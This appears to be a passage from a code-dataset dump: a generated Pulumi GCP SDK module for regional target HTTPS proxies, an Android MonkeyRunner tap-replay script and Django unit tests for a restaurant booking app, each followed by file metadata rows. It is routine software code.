@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@creation_timestamp.setter
def creation_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_timestamp", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="proxyId")
def proxy_id(self) -> Optional[pulumi.Input[int]]:
"""
The unique identifier for the resource.
"""
return pulumi.get(self, "proxy_id")
@proxy_id.setter
def proxy_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "proxy_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter(name="sslCertificates")
def ssl_certificates(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
"""
return pulumi.get(self, "ssl_certificates")
@ssl_certificates.setter
def ssl_certificates(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssl_certificates", value)
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> Optional[pulumi.Input[str]]:
"""
A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
return pulumi.get(self, "url_map")
@url_map.setter
def url_map(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_map", value)
class RegionTargetHttpsProxy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
ssl_certificates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url_map: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents a RegionTargetHttpsProxy resource, which is used by one or more
forwarding rules to route incoming HTTPS requests to a URL map.
To get more information about RegionTargetHttpsProxy, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/regionTargetHttpsProxies)
* How-to Guides
* [Official Documentation](https://cloud.google.com/compute/docs/load-balancing/http/target-proxies)
## Example Usage
### Region Target Https Proxy Basic
```python
import pulumi
import pulumi_gcp as gcp
default_region_ssl_certificate = gcp.compute.RegionSslCertificate("defaultRegionSslCertificate",
region="us-central1",
private_key=(lambda path: open(path).read())("path/to/private.key"),
certificate=(lambda path: open(path).read())("path/to/certificate.crt"))
default_region_health_check = gcp.compute.RegionHealthCheck("defaultRegionHealthCheck",
region="us-central1",
http_health_check=gcp.compute.RegionHealthCheckHttpHealthCheckArgs(
port=80,
))
default_region_backend_service = gcp.compute.RegionBackendService("defaultRegionBackendService",
region="us-central1",
protocol="HTTP",
load_balancing_scheme="INTERNAL_MANAGED",
timeout_sec=10,
health_checks=[default_region_health_check.id])
default_region_url_map = gcp.compute.RegionUrlMap("defaultRegionUrlMap",
region="us-central1",
description="a description",
default_service=default_region_backend_service.id,
host_rules=[gcp.compute.RegionUrlMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.RegionUrlMapPathMatcherArgs(
name="allpaths",
default_service=default_region_backend_service.id,
path_rules=[gcp.compute.RegionUrlMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_region_backend_service.id,
)],
)])
default_region_target_https_proxy = gcp.compute.RegionTargetHttpsProxy("defaultRegionTargetHttpsProxy",
region="us-central1",
url_map=default_region_url_map.id,
ssl_certificates=[default_region_ssl_certificate.id])
```
## Import
RegionTargetHttpsProxy can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default projects/{{project}}/regions/{{region}}/targetHttpsProxies/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssl_certificates: A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
:param pulumi.Input[str] url_map: A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RegionTargetHttpsProxyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a RegionTargetHttpsProxy resource, which is used by one or more
forwarding rules to route incoming HTTPS requests to a URL map.
To get more information about RegionTargetHttpsProxy, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/regionTargetHttpsProxies)
* How-to Guides
* [Official Documentation](https://cloud.google.com/compute/docs/load-balancing/http/target-proxies)
## Example Usage
### Region Target Https Proxy Basic
```python
import pulumi
import pulumi_gcp as gcp
default_region_ssl_certificate = gcp.compute.RegionSslCertificate("defaultRegionSslCertificate",
region="us-central1",
private_key=(lambda path: open(path).read())("path/to/private.key"),
certificate=(lambda path: open(path).read())("path/to/certificate.crt"))
default_region_health_check = gcp.compute.RegionHealthCheck("defaultRegionHealthCheck",
region="us-central1",
http_health_check=gcp.compute.RegionHealthCheckHttpHealthCheckArgs(
port=80,
))
default_region_backend_service = gcp.compute.RegionBackendService("defaultRegionBackendService",
region="us-central1",
protocol="HTTP",
load_balancing_scheme="INTERNAL_MANAGED",
timeout_sec=10,
health_checks=[default_region_health_check.id])
default_region_url_map = gcp.compute.RegionUrlMap("defaultRegionUrlMap",
region="us-central1",
description="a description",
default_service=default_region_backend_service.id,
host_rules=[gcp.compute.RegionUrlMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.RegionUrlMapPathMatcherArgs(
name="allpaths",
default_service=default_region_backend_service.id,
path_rules=[gcp.compute.RegionUrlMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_region_backend_service.id,
)],
)])
default_region_target_https_proxy = gcp.compute.RegionTargetHttpsProxy("defaultRegionTargetHttpsProxy",
region="us-central1",
url_map=default_region_url_map.id,
ssl_certificates=[default_region_ssl_certificate.id])
```
## Import
RegionTargetHttpsProxy can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default projects/{{project}}/regions/{{region}}/targetHttpsProxies/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{name}}
```
:param str resource_name: The name of the resource.
:param RegionTargetHttpsProxyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RegionTargetHttpsProxyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
ssl_certificates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url_map: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RegionTargetHttpsProxyArgs.__new__(RegionTargetHttpsProxyArgs)
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["region"] = region
if ssl_certificates is None and not opts.urn:
raise TypeError("Missing required property 'ssl_certificates'")
__props__.__dict__["ssl_certificates"] = ssl_certificates
if url_map is None and not opts.urn:
raise TypeError("Missing required property 'url_map'")
__props__.__dict__["url_map"] = url_map
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["proxy_id"] = None
__props__.__dict__["self_link"] = None
super(RegionTargetHttpsProxy, __self__).__init__(
'gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
creation_timestamp: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
ssl_certificates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url_map: Optional[pulumi.Input[str]] = None) -> 'RegionTargetHttpsProxy':
"""
Get an existing RegionTargetHttpsProxy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[int] proxy_id: The unique identifier for the resource.
:param pulumi.Input[str] region: The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssl_certificates: A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
:param pulumi.Input[str] url_map: A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RegionTargetHttpsProxyState.__new__(_RegionTargetHttpsProxyState)
__props__.__dict__["creation_timestamp"] = creation_timestamp
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["proxy_id"] = proxy_id
__props__.__dict__["region"] = region
__props__.__dict__["self_link"] = self_link
__props__.__dict__["ssl_certificates"] = ssl_certificates
__props__.__dict__["url_map"] = url_map
return RegionTargetHttpsProxy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="proxyId")
def proxy_id(self) -> pulumi.Output[int]:
"""
The unique identifier for the resource.
"""
return pulumi.get(self, "proxy_id")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@property
@pulumi.getter(name="sslCertificates")
def ssl_certificates(self) -> pulumi.Output[Sequence[str]]:
"""
A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
"""
return pulumi.get(self, "ssl_certificates")
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> pulumi.Output[str]:
"""
A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
return pulumi.get(self, "url_map")
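# --- Editorial note, not part of the generated SDK file -------------------
# The class docstring above demonstrates resource creation but not the
# static get() lookup. A minimal sketch, assuming a configured Pulumi GCP
# project; the resource name and ID below are hypothetical placeholders:
#
#     import pulumi_gcp as gcp
#
#     # Adopt an existing proxy into the program by its provider ID.
#     existing = gcp.compute.RegionTargetHttpsProxy.get(
#         "existing-proxy",
#         id="projects/my-project/regions/us-central1/targetHttpsProxies/my-proxy")
#
#     # Outputs such as existing.self_link are then available like any
#     # other resource output.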
| 44.905523
| 158
| 0.644247
| 3,513
| 30,895
| 5.504697
| 0.079135
| 0.064278
| 0.066605
| 0.056883
| 0.884011
| 0.864257
| 0.843572
| 0.833178
| 0.826507
| 0.799514
| 0
| 0.00471
| 0.264735
| 30,895
| 687
| 159
| 44.970888
| 0.846584
| 0.49063
| 0
| 0.679577
| 1
| 0
| 0.08795
| 0.009637
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161972
| false
| 0.003521
| 0.017606
| 0
| 0.278169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 1634b06bdc61adc98a860acf53577605abcf0be9
| 1,339
| py
| Python
| utility/refined_events/gallary_record.py
| EfficientAI/efficient_cv
| e308f229e4d99da86ad56f87f3a78b2c81f27ca5
| ["MIT"]
| null
| null
| null
| utility/refined_events/gallary_record.py
| EfficientAI/efficient_cv
| e308f229e4d99da86ad56f87f3a78b2c81f27ca5
| ["MIT"]
| null
| null
| null
| utility/refined_events/gallary_record.py
| EfficientAI/efficient_cv
| e308f229e4d99da86ad56f87f3a78b2c81f27ca5
| ["MIT"]
| null
| null
| null
|
from com.android.monkeyrunner import MonkeyRunner
from com.android.monkeyrunner import MonkeyDevice
print('Connecting to device...')
device = MonkeyRunner.waitForConnection()
print('Connected to device')
# Reproduce action log from here
print('Starting to reproduce action log')
device.touch(540, 1696, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(540, 1696, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(118, 608, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(118, 608, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(165, 444, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(165, 444, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(914, 1832, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(914, 1832, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(877, 1032, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(877, 1032, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(87, 72, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(87, 72, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)
print('Executing : device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
print('Finished reproducing action log')
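# --- Editorial note, not part of the original script ----------------------
# The repeated touch/print/sleep triples above could be replayed from a
# coordinate list instead. A minimal sketch (left commented out so the log
# is not replayed twice), assuming the same MonkeyRunner environment:
#
# taps = [(540, 1696), (118, 608), (165, 444), (914, 1832), (877, 1032), (87, 72)]
# for x, y in taps:
#     device.touch(x, y, MonkeyDevice.DOWN_AND_UP)
#     print('Executing : device.touch(%d, %d, MonkeyDevice.DOWN_AND_UP)' % (x, y))
#     MonkeyRunner.sleep(1.0)
# device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)
# MonkeyRunner.sleep(1.0)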
| 35.236842
| 75
| 0.791636
| 194
| 1,339
| 5.309278
| 0.21134
| 0.217476
| 0.258252
| 0.285437
| 0.814563
| 0.752427
| 0.752427
| 0.738835
| 0.292233
| 0.247573
| 0
| 0.07114
| 0.076176
| 1,339
| 38
| 76
| 35.236842
| 0.76152
| 0.022405
| 0
| 0.25
| 0
| 0
| 0.412844
| 0.155199
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.392857
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 167112d052f90389462fef038cc2d92f36bb6170
| 28,803
| py
| Python
| webapp/tests.py
| srijanss/rhub
| 60a5b2cd4a1fae3cd9d9029e132bcf1f5154cc54
| ["MIT"]
| null
| null
| null
| webapp/tests.py
| srijanss/rhub
| 60a5b2cd4a1fae3cd9d9029e132bcf1f5154cc54
| ["MIT"]
| null
| null
| null
| webapp/tests.py
| srijanss/rhub
| 60a5b2cd4a1fae3cd9d9029e132bcf1f5154cc54
| ["MIT"]
| null
| null
| null
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from django.urls import reverse
from django.test import TestCase
from django.utils import timezone
import copy
from django.contrib.auth.models import User, Group
from .models import Restaurant, Type, Cuisine, Food, Booking
from .views import set_permissions
CREDENTIALS = {
'name': 'test',
'description': 'test',
'state': 'test',
'city': 'test',
'street': 'test',
'longitude': 0.000111,
'latitude': 0.000111,
'telephone': '1234567890',
'website': 'http://test.com'
}
class RestaurantModelTests(TestCase):
def test_restaurant_object_creation(self):
"""
Restaurant object created must return true for isinstance() and
__str__() must be equal to restaurant's name
"""
restaurant = create_restaurant("Test Restaurant")
self.assertIs(isinstance(restaurant, Restaurant), True)
self.assertEqual(restaurant.__str__(), restaurant.name)
class TypeModelTests(TestCase):
def test_type_object_creation(self):
"""
Type object created must return true for isinstance() and
__str__() must be equal to restaurant's type
"""
restaurant_type = Type.objects.create(name="Test Restaurant Type")
self.assertIs(isinstance(restaurant_type, Type), True)
self.assertEqual(restaurant_type.__str__(), restaurant_type.name)
class CuisineModelTests(TestCase):
def test_cuisine_object_creation(self):
"""
Cuisine object created must return true for isinstance() and
__str__() must be equal to cuisine name
"""
cuisine = Cuisine.objects.create(name="Test Cuisine")
self.assertIs(isinstance(cuisine, Cuisine), True)
self.assertEqual(cuisine.__str__(), cuisine.name)
class FoodModelTests(TestCase):
def test_food_object_creation(self):
"""
Food object created must return true for isinstance() and
__str__() must be equal to food name
"""
cuisine = Cuisine.objects.create(name="Test Cuisine")
food = Food.objects.create(name="Test Food", cuisine_id=cuisine.id)
self.assertIs(isinstance(food, Food), True)
self.assertEqual(food.__str__(), food.name)
class BookModelTests(TestCase):
def test_booking_object_creation(self):
""" Booking object created must return restaurant name
and booked date and time
"""
user = User.objects.create_user(username='test')
restaurant = create_restaurant('Test Restaurant')
booking_date = timezone.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
self.assertIs(isinstance(booking, Booking), True)
self.assertEqual(booking.__str__(), booking.restaurant.name + ", Time: " + booking_date.strftime('%Y-%m-%d %H:%M:%S'))
class IndexViewTests(TestCase):
def test_no_restaurants(self):
""" If no Restaurant exists appropriate message should be displayed
"""
response = self.client.get(reverse('webapp:index'))
self.assertContains(response, "No restaurant added")
self.assertQuerysetEqual(response.context['restaurant_list'], [])
def test_one_restaurant(self):
""" If one Restaurant exists it should be displayed in the index page
"""
create_restaurant("Test Restaurant")
response = self.client.get(reverse('webapp:index'))
self.assertQuerysetEqual(response.context['restaurant_list'], [
'<Restaurant: Test Restaurant>'])
def test_two_restaurants(self):
""" If two Restaurant exists both should be displayed in the index page
"""
create_restaurant("Test Restaurant 1")
create_restaurant("Test Restaurant 2")
response = self.client.get(reverse('webapp:index'))
self.assertQuerysetEqual(response.context['restaurant_list'],
['<Restaurant: Test Restaurant 2>',
'<Restaurant: Test Restaurant 1>']
)
class DetailViewTests(TestCase):
def test_no_restaurant(self):
""" If restaurant with given id is not found message
Restaurant doesnot exists should be shown to user
"""
response = self.client.get(reverse('webapp:detail', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, "Restaurant doesnot exists..")
def test_with_restaurant(self):
""" If restaurant exists restaurant details must shown in detail page
"""
restaurant = create_restaurant("Test Restaurant")
response = self.client.get(
reverse('webapp:detail', args=(restaurant.id,)))
self.assertEqual(
response.context['restaurant'].name, 'Test Restaurant')
class SearchViewTests(TestCase):
def test_search_view_with_get_request(self):
""" GET request to search page should redirect to listing page
and show all the listings of restaurants
"""
response = self.client.get(reverse('webapp:search'))
self.assertRedirects(response, reverse('webapp:search_listing', args=("all",)))
def test_search_view_with_post_request(self):
""" POST request to search page should redirect to listing page
and show the list of restaurants matching the search text
"""
create_restaurant("Test Restaurant")
search_text = "test"
response = self.client.post(reverse('webapp:search'), {'search_field':search_text})
self.assertRedirects(response, reverse('webapp:search_listing', args=(search_text,)))
def test_search_view_with_empty_data_request(self):
""" POST request to search page with empty string should redirect to listing page
and show all restaurants
"""
create_restaurant("Test Restaurant")
search_text = ""
response = self.client.post(reverse('webapp:search'), {'search_field':search_text})
self.assertRedirects(response, reverse('webapp:search_listing', args=("all",)))
class SearchViewListingTests(TestCase):
def test_no_matching_content(self):
""" If search content doesnot match the restaurant name or type
or restaurant doesnot exists, appropriate message should be shown
"""
search_text = "test"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], [])
def test_name_matching_with_search_text(self):
""" If search content match with the restaurant name
that restaurant should be shown in the list
"""
create_restaurant("Test Restaurant")
search_text = "test"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Test Restaurant>'])
def test_type_matching_with_search_text(self):
""" If search content match with the restaurant type
that restaurant should be shown in the list
"""
restaurant = create_restaurant("Test Restaurant")
restaurant.types.create(name="Diner")
search_text = "diner"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Test Restaurant>'])
def test_name_and_type_matching_with_search_text(self):
""" If search content matches the restaurant name and type
only one result of the matching restaurant should be shown
"""
restaurant = create_restaurant("Diner Restaurant")
restaurant.types.create(name="Diner")
search_text = "diner"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant>'])
def test_search_list_pagination_with_given_pagenumber(self):
""" If page number is given as parameter then search list should
show that page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = 2
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 3>','<Restaurant: Diner Restaurant 4>'])
def test_search_list_pagination_with_noninteger_pagenumber(self):
""" If non integer page number is given as parameter then search list should
show the first page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = "two"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 1>','<Restaurant: Diner Restaurant 2>'])
def test_search_list_pagination_with_nonexisting_pagenumber(self):
""" If non existing page number is given as parameter then search list should
show the last page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = 5
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 3>','<Restaurant: Diner Restaurant 4>'])
class RestaurantCreateViewTests(TestCase):
def test_view_loads(self):
""" View should be loaded for GET request
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:restaurant_create'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webapp/restaurant_form.html')
def test_view_fails_blank(self):
""" Validation error should be shown if posted with blank data
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:restaurant_create'), {})
self.assertFormError(response, 'form', 'name', 'This field is required.')
def test_view_fails_invalid(self):
""" Validation error should be shown if invalid data is posted
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
self.credentials = CREDENTIALS.copy()
self.credentials['longitude'] = 'error'
response = self.client.post(
reverse('webapp:restaurant_create'), self.credentials)
self.assertFormError(response, 'form', 'longitude', 'Enter a number.')
def test_view_valid_post(self):
""" If there is no validation error then it should redirect to restaurant's detail page
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
type1 = Type.objects.create(name="test")
cuisine1 = Cuisine.objects.create(name="test")
self.credentials = CREDENTIALS.copy()
self.credentials["types"] = [type1.id]
self.credentials["cuisines"] = [cuisine1.id]
response = self.client.post(
reverse('webapp:restaurant_create'), self.credentials)
self.assertRedirects(response, reverse('webapp:detail', args=(1,)))
class RestaurantUpdateViewTests(TestCase):
def test_no_restaurant(self):
""" If restaurant with given id is not found it should show message
Restaurant doesnot exists
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
